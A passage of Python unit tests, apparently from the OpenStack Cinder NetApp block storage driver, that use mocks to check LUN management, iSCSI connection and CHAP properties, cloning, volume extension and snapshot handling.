def test_get_existing_vol_manage_lun(self):
self.zapi_client.get_lun_by_args.return_value = ['lun0', 'lun1']
lun = self.library._get_existing_vol_with_manage_ref(
{'source-id': 'src_id', 'path': 'lun_path'})
self.assertEqual(1, self.zapi_client.get_lun_by_args.call_count)
self.library._extract_lun_info.assert_called_once_with('lun0')
self.assertEqual('lun0', lun.name)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_existing_vol_with_manage_ref',
mock.Mock(return_value=block_base.NetAppLun(
'handle', 'name', '1073742824', {})))
def test_manage_existing_get_size(self):
size = self.library.manage_existing_get_size(
{'id': 'vol_id'}, {'ref': 'ref'})
self.assertEqual(2, size)
self.library._get_existing_vol_with_manage_ref.assert_called_once_with(
{'ref': 'ref'})
@mock.patch.object(block_base.LOG, 'info')
def test_unmanage(self, log):
mock_lun = block_base.NetAppLun('handle', 'name', '1',
{'Path': 'p', 'UUID': 'uuid'})
self.library._get_lun_from_table = mock.Mock(return_value=mock_lun)
self.library.unmanage({'name': 'vol'})
self.library._get_lun_from_table.assert_called_once_with('vol')
self.assertEqual(1, log.call_count)
def test_check_vol_type_for_lun(self):
self.assertRaises(NotImplementedError,
self.library._check_volume_type_for_lun,
'vol', 'lun', 'existing_ref', {})
def test_is_lun_valid_on_storage(self):
self.assertTrue(self.library._is_lun_valid_on_storage('lun'))
def test_initialize_connection_iscsi(self):
target_details_list = fake.ISCSI_TARGET_DETAILS_LIST
volume = fake.ISCSI_VOLUME
connector = fake.ISCSI_CONNECTOR
self.mock_object(block_base.NetAppBlockStorageLibrary, '_map_lun',
mock.Mock(return_value=fake.ISCSI_LUN['lun_id']))
self.zapi_client.get_iscsi_target_details.return_value = (
target_details_list)
self.mock_object(block_base.NetAppBlockStorageLibrary,
'_get_preferred_target_from_list',
mock.Mock(return_value=target_details_list[1]))
self.zapi_client.get_iscsi_service_details.return_value = (
fake.ISCSI_SERVICE_IQN)
self.mock_object(
na_utils, 'get_iscsi_connection_properties',
mock.Mock(return_value=fake.ISCSI_CONNECTION_PROPERTIES))
target_info = self.library.initialize_connection_iscsi(volume,
connector)
self.assertEqual(
fake.ISCSI_CONNECTION_PROPERTIES['data']['auth_method'],
target_info['data']['auth_method'])
self.assertEqual(
fake.ISCSI_CONNECTION_PROPERTIES['data']['auth_password'],
target_info['data']['auth_password'])
self.assertTrue('auth_password' in target_info['data'])
self.assertEqual(
fake.ISCSI_CONNECTION_PROPERTIES['data']['discovery_auth_method'],
target_info['data']['discovery_auth_method'])
self.assertEqual(
fake.ISCSI_CONNECTION_PROPERTIES['data']
['discovery_auth_password'],
target_info['data']['discovery_auth_password'])
self.assertTrue('auth_password' in target_info['data'])
self.assertEqual(
fake.ISCSI_CONNECTION_PROPERTIES['data']
['discovery_auth_username'],
target_info['data']['discovery_auth_username'])
self.assertEqual(fake.ISCSI_CONNECTION_PROPERTIES, target_info)
block_base.NetAppBlockStorageLibrary._map_lun.assert_called_once_with(
fake.ISCSI_VOLUME['name'], [fake.ISCSI_CONNECTOR['initiator']],
'iscsi', None)
self.zapi_client.get_iscsi_target_details.assert_called_once_with()
block_base.NetAppBlockStorageLibrary._get_preferred_target_from_list\
.assert_called_once_with(
target_details_list)
self.zapi_client.get_iscsi_service_details.assert_called_once_with()
def test_initialize_connection_iscsi_no_target_list(self):
volume = fake.ISCSI_VOLUME
connector = fake.ISCSI_CONNECTOR
self.mock_object(block_base.NetAppBlockStorageLibrary, '_map_lun',
mock.Mock(return_value=fake.ISCSI_LUN['lun_id']))
self.zapi_client.get_iscsi_target_details.return_value = None
self.mock_object(block_base.NetAppBlockStorageLibrary,
'_get_preferred_target_from_list')
self.mock_object(
na_utils, 'get_iscsi_connection_properties',
mock.Mock(return_value=fake.ISCSI_CONNECTION_PROPERTIES))
self.assertRaises(exception.VolumeBackendAPIException,
self.library.initialize_connection_iscsi,
volume, connector)
self.assertEqual(
0, block_base.NetAppBlockStorageLibrary
._get_preferred_target_from_list.call_count)
self.assertEqual(
0, self.zapi_client.get_iscsi_service_details.call_count)
self.assertEqual(
0, na_utils.get_iscsi_connection_properties.call_count)
def test_initialize_connection_iscsi_no_preferred_target(self):
volume = fake.ISCSI_VOLUME
connector = fake.ISCSI_CONNECTOR
self.mock_object(block_base.NetAppBlockStorageLibrary, '_map_lun',
mock.Mock(return_value=fake.ISCSI_LUN['lun_id']))
self.zapi_client.get_iscsi_target_details.return_value = None
self.mock_object(block_base.NetAppBlockStorageLibrary,
'_get_preferred_target_from_list',
mock.Mock(return_value=None))
self.mock_object(na_utils, 'get_iscsi_connection_properties')
self.assertRaises(exception.VolumeBackendAPIException,
self.library.initialize_connection_iscsi,
volume, connector)
self.assertEqual(0, self.zapi_client
.get_iscsi_service_details.call_count)
self.assertEqual(0, na_utils.get_iscsi_connection_properties
.call_count)
def test_initialize_connection_iscsi_no_iscsi_service_details(self):
target_details_list = fake.ISCSI_TARGET_DETAILS_LIST
volume = fake.ISCSI_VOLUME
connector = fake.ISCSI_CONNECTOR
self.mock_object(block_base.NetAppBlockStorageLibrary, '_map_lun',
mock.Mock(return_value=fake.ISCSI_LUN['lun_id']))
self.zapi_client.get_iscsi_target_details.return_value = (
target_details_list)
self.mock_object(block_base.NetAppBlockStorageLibrary,
'_get_preferred_target_from_list',
mock.Mock(return_value=target_details_list[1]))
self.zapi_client.get_iscsi_service_details.return_value = None
self.mock_object(na_utils, 'get_iscsi_connection_properties')
self.assertRaises(exception.VolumeBackendAPIException,
self.library.initialize_connection_iscsi,
volume,
connector)
block_base.NetAppBlockStorageLibrary._map_lun.assert_called_once_with(
fake.ISCSI_VOLUME['name'], [fake.ISCSI_CONNECTOR['initiator']],
'iscsi', None)
self.zapi_client.get_iscsi_target_details.assert_called_once_with()
block_base.NetAppBlockStorageLibrary._get_preferred_target_from_list\
.assert_called_once_with(target_details_list)
def test_get_target_details_list(self):
target_details_list = fake.ISCSI_TARGET_DETAILS_LIST
result = self.library._get_preferred_target_from_list(
target_details_list)
self.assertEqual(target_details_list[0], result)
def test_get_preferred_target_from_empty_list(self):
target_details_list = []
result = self.library._get_preferred_target_from_list(
target_details_list)
self.assertIsNone(result)
def test_get_preferred_target_from_list_with_one_interface_disabled(self):
target_details_list = copy.deepcopy(fake.ISCSI_TARGET_DETAILS_LIST)
target_details_list[0]['interface-enabled'] = 'false'
result = self.library._get_preferred_target_from_list(
target_details_list)
self.assertEqual(target_details_list[1], result)
def test_get_preferred_target_from_list_with_all_interfaces_disabled(self):
target_details_list = copy.deepcopy(fake.ISCSI_TARGET_DETAILS_LIST)
for target in target_details_list:
target['interface-enabled'] = 'false'
result = self.library._get_preferred_target_from_list(
target_details_list)
self.assertEqual(target_details_list[0], result)
def test_get_preferred_target_from_list_with_filter(self):
target_details_list = fake.ISCSI_TARGET_DETAILS_LIST
filter = [target_detail['address']
for target_detail in target_details_list[1:]]
result = self.library._get_preferred_target_from_list(
target_details_list, filter)
self.assertEqual(target_details_list[1], result)
@mock.patch.object(na_utils, 'check_flags', mock.Mock())
@mock.patch.object(block_base, 'LOG', mock.Mock())
def test_setup_error_invalid_lun_os(self):
self.library.configuration.netapp_lun_ostype = 'unknown'
self.library.do_setup(mock.Mock())
self.assertRaises(exception.NetAppDriverException,
self.library.check_for_setup_error)
msg = _("Invalid value for NetApp configuration"
" option netapp_lun_ostype.")
block_base.LOG.error.assert_called_once_with(msg)
@mock.patch.object(na_utils, 'check_flags', mock.Mock())
@mock.patch.object(block_base, 'LOG', mock.Mock())
def test_setup_error_invalid_host_type(self):
self.library.configuration.netapp_lun_ostype = 'linux'
self.library.configuration.netapp_host_type = 'future_os'
self.library.do_setup(mock.Mock())
self.assertRaises(exception.NetAppDriverException,
self.library.check_for_setup_error)
msg = _("Invalid value for NetApp configuration"
" option netapp_host_type.")
block_base.LOG.error.assert_called_once_with(msg)
@mock.patch.object(na_utils, 'check_flags', mock.Mock())
def test_check_for_setup_error_both_config(self):
self.library.configuration.netapp_lun_ostype = 'linux'
self.library.configuration.netapp_host_type = 'linux'
self.library.do_setup(mock.Mock())
self.zapi_client.get_lun_list.return_value = ['lun1']
self.library._extract_and_populate_luns = mock.Mock()
self.library.check_for_setup_error()
self.library._extract_and_populate_luns.assert_called_once_with(
['lun1'])
@mock.patch.object(na_utils, 'check_flags', mock.Mock())
def test_check_for_setup_error_no_os_host(self):
self.library.configuration.netapp_lun_ostype = None
self.library.configuration.netapp_host_type = None
self.library.do_setup(mock.Mock())
self.zapi_client.get_lun_list.return_value = ['lun1']
self.library._extract_and_populate_luns = mock.Mock()
self.library.check_for_setup_error()
self.library._extract_and_populate_luns.assert_called_once_with(
['lun1'])
def test_delete_volume(self):
mock_delete_lun = self.mock_object(self.library, '_delete_lun')
self.library.delete_volume(fake.VOLUME)
mock_delete_lun.assert_called_once_with(fake.LUN_NAME)
def test_delete_lun(self):
mock_get_lun_attr = self.mock_object(self.library, '_get_lun_attr')
mock_get_lun_attr.return_value = fake.LUN_METADATA
self.library.zapi_client = mock.Mock()
self.library.lun_table = fake.LUN_TABLE
self.library._delete_lun(fake.LUN_NAME)
mock_get_lun_attr.assert_called_once_with(
fake.LUN_NAME, 'metadata')
self.library.zapi_client.destroy_lun.assert_called_once_with(fake.PATH)
def test_delete_lun_no_metadata(self):
self.mock_object(self.library, '_get_lun_attr', mock.Mock(
return_value=None))
self.library.zapi_client = mock.Mock()
self.mock_object(self.library, 'zapi_client')
self.library._delete_lun(fake.LUN_NAME)
self.library._get_lun_attr.assert_called_once_with(
fake.LUN_NAME, 'metadata')
self.assertEqual(0, self.library.zapi_client.destroy_lun.call_count)
self.assertEqual(0,
self.zapi_client.
mark_qos_policy_group_for_deletion.call_count)
def test_delete_snapshot(self):
mock_delete_lun = self.mock_object(self.library, '_delete_lun')
self.library.delete_snapshot(fake.SNAPSHOT)
mock_delete_lun.assert_called_once_with(fake.SNAPSHOT_NAME)
def test_clone_source_to_destination(self):
self.mock_object(na_utils, 'get_volume_extra_specs', mock.Mock(
return_value=fake.EXTRA_SPECS))
self.mock_object(self.library, '_setup_qos_for_volume', mock.Mock(
return_value=fake.QOS_POLICY_GROUP_INFO))
self.mock_object(self.library, '_clone_lun')
self.mock_object(self.library, '_extend_volume')
self.mock_object(self.library, 'delete_volume')
self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
self.library.lun_space_reservation = 'false'
self.library._clone_source_to_destination(fake.CLONE_SOURCE,
fake.CLONE_DESTINATION)
na_utils.get_volume_extra_specs.assert_called_once_with(
fake.CLONE_DESTINATION)
self.library._setup_qos_for_volume.assert_called_once_with(
fake.CLONE_DESTINATION, fake.EXTRA_SPECS)
self.library._clone_lun.assert_called_once_with(
fake.CLONE_SOURCE_NAME, fake.CLONE_DESTINATION_NAME,
space_reserved='false',
qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
self.library._extend_volume.assert_called_once_with(
fake.CLONE_DESTINATION, fake.CLONE_DESTINATION_SIZE,
fake.QOS_POLICY_GROUP_NAME)
self.assertEqual(0, self.library.delete_volume.call_count)
self.assertEqual(0, self.library.
_mark_qos_policy_group_for_deletion.call_count)
def test_clone_source_to_destination_exception_path(self):
self.mock_object(na_utils, 'get_volume_extra_specs', mock.Mock(
return_value=fake.EXTRA_SPECS))
self.mock_object(self.library, '_setup_qos_for_volume', mock.Mock(
return_value=fake.QOS_POLICY_GROUP_INFO))
self.mock_object(self.library, '_clone_lun')
self.mock_object(self.library, '_extend_volume', mock.Mock(
side_effect=Exception))
self.mock_object(self.library, 'delete_volume')
self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
self.library.lun_space_reservation = 'true'
self.assertRaises(exception.VolumeBackendAPIException,
self.library._clone_source_to_destination,
fake.CLONE_SOURCE, fake.CLONE_DESTINATION)
na_utils.get_volume_extra_specs.assert_called_once_with(
fake.CLONE_DESTINATION)
self.library._setup_qos_for_volume.assert_called_once_with(
fake.CLONE_DESTINATION, fake.EXTRA_SPECS)
self.library._clone_lun.assert_called_once_with(
fake.CLONE_SOURCE_NAME, fake.CLONE_DESTINATION_NAME,
space_reserved='true',
qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
self.library._extend_volume.assert_called_once_with(
fake.CLONE_DESTINATION, fake.CLONE_DESTINATION_SIZE,
fake.QOS_POLICY_GROUP_NAME)
self.assertEqual(1, self.library.delete_volume.call_count)
self.assertEqual(1, self.library.
_mark_qos_policy_group_for_deletion.call_count)
def test_create_lun(self):
self.assertRaises(NotImplementedError, self.library._create_lun,
fake.VOLUME_ID, fake.LUN_ID, fake.SIZE,
fake.LUN_METADATA)
def test_clone_lun(self):
self.assertRaises(NotImplementedError, self.library._clone_lun,
fake.VOLUME_ID, 'new-' + fake.VOLUME_ID)
def test_create_volume_from_snapshot(self):
mock_do_clone = self.mock_object(self.library,
'_clone_source_to_destination')
source = {
'name': fake.SNAPSHOT['name'],
'size': fake.SNAPSHOT['volume_size']
}
self.library.create_volume_from_snapshot(fake.VOLUME, fake.SNAPSHOT)
mock_do_clone.assert_has_calls([
mock.call(source, fake.VOLUME)])
def test_create_cloned_volume(self):
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE, fake.LUN_ID,
fake.LUN_SIZE, fake.LUN_METADATA)
mock_get_lun_from_table = self.mock_object(self.library,
'_get_lun_from_table')
mock_get_lun_from_table.return_value = fake_lun
mock_do_clone = self.mock_object(self.library,
'_clone_source_to_destination')
source = {
'name': fake_lun.name,
'size': fake.VOLUME_REF['size']
}
self.library.create_cloned_volume(fake.VOLUME, fake.VOLUME_REF)
mock_do_clone.assert_has_calls([
mock.call(source, fake.VOLUME)])
def test_extend_volume(self):
new_size = 100
volume_copy = copy.copy(fake.VOLUME)
volume_copy['size'] = new_size
mock_get_volume_extra_specs = self.mock_object(
na_utils, 'get_volume_extra_specs',
mock.Mock(return_value=fake.EXTRA_SPECS))
mock_setup_qos_for_volume = self.mock_object(
self.library, '_setup_qos_for_volume',
mock.Mock(return_value=fake.QOS_POLICY_GROUP_INFO))
mock_extend_volume = self.mock_object(self.library, '_extend_volume')
self.library.extend_volume(fake.VOLUME, new_size)
mock_get_volume_extra_specs.assert_called_once_with(fake.VOLUME)
mock_setup_qos_for_volume.assert_called_once_with(volume_copy,
fake.EXTRA_SPECS)
mock_extend_volume.assert_called_once_with(fake.VOLUME,
new_size,
fake.QOS_POLICY_GROUP_NAME)
def test_extend_volume_api_error(self):
new_size = 100
volume_copy = copy.copy(fake.VOLUME)
volume_copy['size'] = new_size
mock_get_volume_extra_specs = self.mock_object(
na_utils, 'get_volume_extra_specs',
mock.Mock(return_value=fake.EXTRA_SPECS))
mock_setup_qos_for_volume = self.mock_object(
self.library, '_setup_qos_for_volume',
mock.Mock(return_value=fake.QOS_POLICY_GROUP_INFO))
mock_extend_volume = self.mock_object(
self.library, '_extend_volume',
mock.Mock(side_effect=netapp_api.NaApiError))
self.assertRaises(netapp_api.NaApiError,
self.library.extend_volume,
fake.VOLUME,
new_size)
mock_get_volume_extra_specs.assert_called_once_with(fake.VOLUME)
mock_setup_qos_for_volume.assert_has_calls([
mock.call(volume_copy, fake.EXTRA_SPECS),
mock.call(fake.VOLUME, fake.EXTRA_SPECS)])
mock_extend_volume.assert_called_once_with(
fake.VOLUME, new_size, fake.QOS_POLICY_GROUP_NAME)
def test__extend_volume_direct(self):
current_size = fake.LUN_SIZE
current_size_bytes = current_size * units.Gi
new_size = fake.LUN_SIZE * 2
new_size_bytes = new_size * units.Gi
max_size = fake.LUN_SIZE * 10
max_size_bytes = max_size * units.Gi
fake_volume = copy.copy(fake.VOLUME)
fake_volume['size'] = new_size
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
fake.LUN_ID,
current_size_bytes,
fake.LUN_METADATA)
mock_get_lun_from_table = self.mock_object(
self.library, '_get_lun_from_table',
mock.Mock(return_value=fake_lun))
fake_lun_geometry = {'max_resize': six.text_type(max_size_bytes)}
mock_get_lun_geometry = self.mock_object(
self.library.zapi_client, 'get_lun_geometry',
mock.Mock(return_value=fake_lun_geometry))
mock_do_direct_resize = self.mock_object(self.library.zapi_client,
'do_direct_resize')
mock_do_sub_clone_resize = self.mock_object(self.library,
'_do_sub_clone_resize')
self.library.lun_table = {fake.VOLUME['name']: fake_lun}
self.library._extend_volume(fake.VOLUME, new_size, 'fake_qos_policy')
mock_get_lun_from_table.assert_called_once_with(fake.VOLUME['name'])
mock_get_lun_geometry.assert_called_once_with(
fake.LUN_METADATA['Path'])
mock_do_direct_resize.assert_called_once_with(
fake.LUN_METADATA['Path'], six.text_type(new_size_bytes))
self.assertFalse(mock_do_sub_clone_resize.called)
self.assertEqual(six.text_type(new_size_bytes),
self.library.lun_table[fake.VOLUME['name']].size)
def test__extend_volume_clone(self):
current_size = fake.LUN_SIZE
current_size_bytes = current_size * units.Gi
new_size = fake.LUN_SIZE * 20
new_size_bytes = new_size * units.Gi
max_size = fake.LUN_SIZE * 10
max_size_bytes = max_size * units.Gi
fake_volume = copy.copy(fake.VOLUME)
fake_volume['size'] = new_size
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
fake.LUN_ID,
current_size_bytes,
fake.LUN_METADATA)
mock_get_lun_from_table = self.mock_object(
self.library, '_get_lun_from_table',
mock.Mock(return_value=fake_lun))
fake_lun_geometry = {'max_resize': six.text_type(max_size_bytes)}
mock_get_lun_geometry = self.mock_object(
self.library.zapi_client, 'get_lun_geometry',
mock.Mock(return_value=fake_lun_geometry))
mock_do_direct_resize = self.mock_object(self.library.zapi_client,
'do_direct_resize')
mock_do_sub_clone_resize = self.mock_object(self.library,
'_do_sub_clone_resize')
self.library.lun_table = {fake.VOLUME['name']: fake_lun}
self.library._extend_volume(fake.VOLUME, new_size, 'fake_qos_policy')
mock_get_lun_from_table.assert_called_once_with(fake.VOLUME['name'])
mock_get_lun_geometry.assert_called_once_with(
fake.LUN_METADATA['Path'])
self.assertFalse(mock_do_direct_resize.called)
mock_do_sub_clone_resize.assert_called_once_with(
fake.LUN_METADATA['Path'], six.text_type(new_size_bytes),
qos_policy_group_name='fake_qos_policy')
self.assertEqual(six.text_type(new_size_bytes),
self.library.lun_table[fake.VOLUME['name']].size)
def test__extend_volume_no_change(self):
current_size = fake.LUN_SIZE
current_size_bytes = current_size * units.Gi
new_size = fake.LUN_SIZE
max_size = fake.LUN_SIZE * 10
max_size_bytes = max_size * units.Gi
fake_volume = copy.copy(fake.VOLUME)
fake_volume['size'] = new_size
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
fake.LUN_ID,
current_size_bytes,
fake.LUN_METADATA)
mock_get_lun_from_table = self.mock_object(
self.library, '_get_lun_from_table',
mock.Mock(return_value=fake_lun))
fake_lun_geometry = {'max_resize': six.text_type(max_size_bytes)}
mock_get_lun_geometry = self.mock_object(
self.library.zapi_client, 'get_lun_geometry',
mock.Mock(return_value=fake_lun_geometry))
mock_do_direct_resize = self.mock_object(self.library.zapi_client,
'do_direct_resize')
mock_do_sub_clone_resize = self.mock_object(self.library,
'_do_sub_clone_resize')
self.library.lun_table = {fake_volume['name']: fake_lun}
self.library._extend_volume(fake_volume, new_size, 'fake_qos_policy')
mock_get_lun_from_table.assert_called_once_with(fake_volume['name'])
self.assertFalse(mock_get_lun_geometry.called)
self.assertFalse(mock_do_direct_resize.called)
self.assertFalse(mock_do_sub_clone_resize.called)
def test_do_sub_clone_resize(self):
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
fake.LUN_ID,
fake.LUN_SIZE,
fake.LUN_METADATA)
new_lun_size = fake.LUN_SIZE * 10
new_lun_name = 'new-%s' % fake.LUN_NAME
block_count = fake.LUN_SIZE * units.Gi / 512
mock_get_lun_from_table = self.mock_object(
self.library, '_get_lun_from_table',
mock.Mock(return_value=fake_lun))
mock_get_vol_option = self.mock_object(
self.library, '_get_vol_option', mock.Mock(return_value='off'))
mock_get_lun_block_count = self.mock_object(
self.library, '_get_lun_block_count',
mock.Mock(return_value=block_count))
mock_create_lun = self.mock_object(
self.library.zapi_client, 'create_lun')
mock_clone_lun = self.mock_object(self.library, '_clone_lun')
mock_post_sub_clone_resize = self.mock_object(
self.library, '_post_sub_clone_resize')
mock_destroy_lun = self.mock_object(
self.library.zapi_client, 'destroy_lun')
self.library._do_sub_clone_resize(fake.LUN_PATH,
new_lun_size,
fake.QOS_POLICY_GROUP_NAME)
mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
mock_get_vol_option.assert_called_once_with('vol0', 'compression')
mock_get_lun_block_count.assert_called_once_with(fake.LUN_PATH)
mock_create_lun.assert_called_once_with(
'vol0', new_lun_name, new_lun_size, fake.LUN_METADATA,
qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
mock_clone_lun.assert_called_once_with(
fake.LUN_NAME, new_lun_name, block_count=block_count)
mock_post_sub_clone_resize.assert_called_once_with(fake.LUN_PATH)
self.assertFalse(mock_destroy_lun.called)
def test_do_sub_clone_resize_compression_on(self):
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
fake.LUN_ID,
fake.LUN_SIZE,
fake.LUN_METADATA)
new_lun_size = fake.LUN_SIZE * 10
block_count = fake.LUN_SIZE * units.Gi / 512
mock_get_lun_from_table = self.mock_object(
self.library, '_get_lun_from_table',
mock.Mock(return_value=fake_lun))
mock_get_vol_option = self.mock_object(
self.library, '_get_vol_option', mock.Mock(return_value='on'))
mock_get_lun_block_count = self.mock_object(
self.library, '_get_lun_block_count',
mock.Mock(return_value=block_count))
mock_create_lun = self.mock_object(
self.library.zapi_client, 'create_lun')
mock_clone_lun = self.mock_object(self.library, '_clone_lun')
mock_post_sub_clone_resize = self.mock_object(
self.library, '_post_sub_clone_resize')
mock_destroy_lun = self.mock_object(
self.library.zapi_client, 'destroy_lun')
self.assertRaises(exception.VolumeBackendAPIException,
self.library._do_sub_clone_resize,
fake.LUN_PATH,
new_lun_size,
fake.QOS_POLICY_GROUP_NAME)
mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
mock_get_vol_option.assert_called_once_with('vol0', 'compression')
self.assertFalse(mock_get_lun_block_count.called)
self.assertFalse(mock_create_lun.called)
self.assertFalse(mock_clone_lun.called)
self.assertFalse(mock_post_sub_clone_resize.called)
self.assertFalse(mock_destroy_lun.called)
def test_do_sub_clone_resize_no_blocks(self):
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
fake.LUN_ID,
fake.LUN_SIZE,
fake.LUN_METADATA)
new_lun_size = fake.LUN_SIZE * 10
block_count = 0
mock_get_lun_from_table = self.mock_object(
self.library, '_get_lun_from_table',
mock.Mock(return_value=fake_lun))
mock_get_vol_option = self.mock_object(
self.library, '_get_vol_option', mock.Mock(return_value='off'))
mock_get_lun_block_count = self.mock_object(
self.library, '_get_lun_block_count',
mock.Mock(return_value=block_count))
mock_create_lun = self.mock_object(
self.library.zapi_client, 'create_lun')
mock_clone_lun = self.mock_object(self.library, '_clone_lun')
mock_post_sub_clone_resize = self.mock_object(
self.library, '_post_sub_clone_resize')
mock_destroy_lun = self.mock_object(
self.library.zapi_client, 'destroy_lun')
self.assertRaises(exception.VolumeBackendAPIException,
self.library._do_sub_clone_resize,
fake.LUN_PATH,
new_lun_size,
fake.QOS_POLICY_GROUP_NAME)
mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
mock_get_vol_option.assert_called_once_with('vol0', 'compression')
mock_get_lun_block_count.assert_called_once_with(fake.LUN_PATH)
self.assertFalse(mock_create_lun.called)
self.assertFalse(mock_clone_lun.called)
self.assertFalse(mock_post_sub_clone_resize.called)
self.assertFalse(mock_destroy_lun.called)
def test_do_sub_clone_resize_create_error(self):
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
fake.LUN_ID,
fake.LUN_SIZE,
fake.LUN_METADATA)
new_lun_size = fake.LUN_SIZE * 10
new_lun_name = 'new-%s' % fake.LUN_NAME
block_count = fake.LUN_SIZE * units.Gi / 512
mock_get_lun_from_table = self.mock_object(
self.library, '_get_lun_from_table',
mock.Mock(return_value=fake_lun))
mock_get_vol_option = self.mock_object(
self.library, '_get_vol_option', mock.Mock(return_value='off'))
mock_get_lun_block_count = self.mock_object(
self.library, '_get_lun_block_count',
mock.Mock(return_value=block_count))
mock_create_lun = self.mock_object(
self.library.zapi_client, 'create_lun',
mock.Mock(side_effect=netapp_api.NaApiError))
mock_clone_lun = self.mock_object(self.library, '_clone_lun')
mock_post_sub_clone_resize = self.mock_object(
self.library, '_post_sub_clone_resize')
mock_destroy_lun = self.mock_object(
self.library.zapi_client, 'destroy_lun')
self.assertRaises(netapp_api.NaApiError,
self.library._do_sub_clone_resize,
fake.LUN_PATH,
new_lun_size,
fake.QOS_POLICY_GROUP_NAME)
mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
mock_get_vol_option.assert_called_once_with('vol0', 'compression')
mock_get_lun_block_count.assert_called_once_with(fake.LUN_PATH)
mock_create_lun.assert_called_once_with(
'vol0', new_lun_name, new_lun_size, fake.LUN_METADATA,
qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
self.assertFalse(mock_clone_lun.called)
self.assertFalse(mock_post_sub_clone_resize.called)
self.assertFalse(mock_destroy_lun.called)
def test_do_sub_clone_resize_clone_error(self):
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
fake.LUN_ID,
fake.LUN_SIZE,
fake.LUN_METADATA)
new_lun_size = fake.LUN_SIZE * 10
new_lun_name = 'new-%s' % fake.LUN_NAME
new_lun_path = '/vol/vol0/%s' % new_lun_name
block_count = fake.LUN_SIZE * units.Gi / 512
mock_get_lun_from_table = self.mock_object(
self.library, '_get_lun_from_table',
mock.Mock(return_value=fake_lun))
mock_get_vol_option = self.mock_object(
self.library, '_get_vol_option', mock.Mock(return_value='off'))
mock_get_lun_block_count = self.mock_object(
self.library, '_get_lun_block_count',
mock.Mock(return_value=block_count))
mock_create_lun = self.mock_object(
self.library.zapi_client, 'create_lun')
mock_clone_lun = self.mock_object(
self.library, '_clone_lun',
mock.Mock(side_effect=netapp_api.NaApiError))
mock_post_sub_clone_resize = self.mock_object(
self.library, '_post_sub_clone_resize')
mock_destroy_lun = self.mock_object(
self.library.zapi_client, 'destroy_lun')
self.assertRaises(netapp_api.NaApiError,
self.library._do_sub_clone_resize,
fake.LUN_PATH,
new_lun_size,
fake.QOS_POLICY_GROUP_NAME)
mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
mock_get_vol_option.assert_called_once_with('vol0', 'compression')
mock_get_lun_block_count.assert_called_once_with(fake.LUN_PATH)
mock_create_lun.assert_called_once_with(
'vol0', new_lun_name, new_lun_size, fake.LUN_METADATA,
qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
mock_clone_lun.assert_called_once_with(
fake.LUN_NAME, new_lun_name, block_count=block_count)
self.assertFalse(mock_post_sub_clone_resize.called)
mock_destroy_lun.assert_called_once_with(new_lun_path)
def test_configure_chap_generate_username_and_password(self):
"""Ensure that a CHAP username and password are generated."""
initiator_name = fake.ISCSI_CONNECTOR['initiator']
username, password = self.library._configure_chap(initiator_name)
self.assertEqual(na_utils.DEFAULT_CHAP_USER_NAME, username)
self.assertIsNotNone(password)
self.assertEqual(len(password), na_utils.CHAP_SECRET_LENGTH)
def test_add_chap_properties(self):
"""Ensure that CHAP properties are added to the properties dictionary
"""
properties = {'data': {}}
self.library._add_chap_properties(properties, 'user1', 'pass1')
data = properties['data']
self.assertEqual('CHAP', data['auth_method'])
self.assertEqual('user1', data['auth_username'])
self.assertEqual('pass1', data['auth_password'])
self.assertEqual('CHAP', data['discovery_auth_method'])
self.assertEqual('user1', data['discovery_auth_username'])
self.assertEqual('pass1', data['discovery_auth_password'])
def test_create_cgsnapshot(self):
snapshot = fake.CG_SNAPSHOT
snapshot['volume'] = fake.CG_VOLUME
mock_extract_host = self.mock_object(
volume_utils, 'extract_host',
mock.Mock(return_value=fake.POOL_NAME))
mock_clone_lun = self.mock_object(self.library, '_clone_lun')
mock_busy = self.mock_object(self.library, '_handle_busy_snapshot')
self.library.create_cgsnapshot(fake.CG_SNAPSHOT, [snapshot])
mock_extract_host.assert_called_once_with(fake.CG_VOLUME['host'],
level='pool')
self.zapi_client.create_cg_snapshot.assert_called_once_with(
set([fake.POOL_NAME]), fake.CG_SNAPSHOT_ID)
mock_clone_lun.assert_called_once_with(
fake.CG_VOLUME_NAME, fake.CG_SNAPSHOT_NAME,
source_snapshot=fake.CG_SNAPSHOT_ID)
mock_busy.assert_called_once_with(fake.POOL_NAME, fake.CG_SNAPSHOT_ID)
def test_delete_cgsnapshot(self):
mock_delete_snapshot = self.mock_object(
self.library, '_delete_lun')
self.library.delete_cgsnapshot(fake.CG_SNAPSHOT, [fake.CG_SNAPSHOT])
mock_delete_snapshot.assert_called_once_with(fake.CG_SNAPSHOT['name'])
def test_delete_cgsnapshot_not_found(self):
self.mock_object(block_base, 'LOG')
self.mock_object(self.library, '_get_lun_attr',
mock.Mock(return_value=None))
self.library.delete_cgsnapshot(fake.CG_SNAPSHOT, [fake.CG_SNAPSHOT])
self.assertEqual(0, block_base.LOG.error.call_count)
self.assertEqual(1, block_base.LOG.warning.call_count)
self.assertEqual(0, block_base.LOG.info.call_count)
def test_create_volume_with_cg(self):
volume_size_in_bytes = int(fake.CG_VOLUME_SIZE) * units.Gi
self._create_volume_test_helper()
self.library.create_volume(fake.CG_VOLUME)
self.library._create_lun.assert_called_once_with(
fake.POOL_NAME, fake.CG_VOLUME_NAME, volume_size_in_bytes,
fake.CG_LUN_METADATA, None)
self.assertEqual(0, self.library.
_mark_qos_policy_group_for_deletion.call_count)
self.assertEqual(0, block_base.LOG.error.call_count)
def _create_volume_test_helper(self):
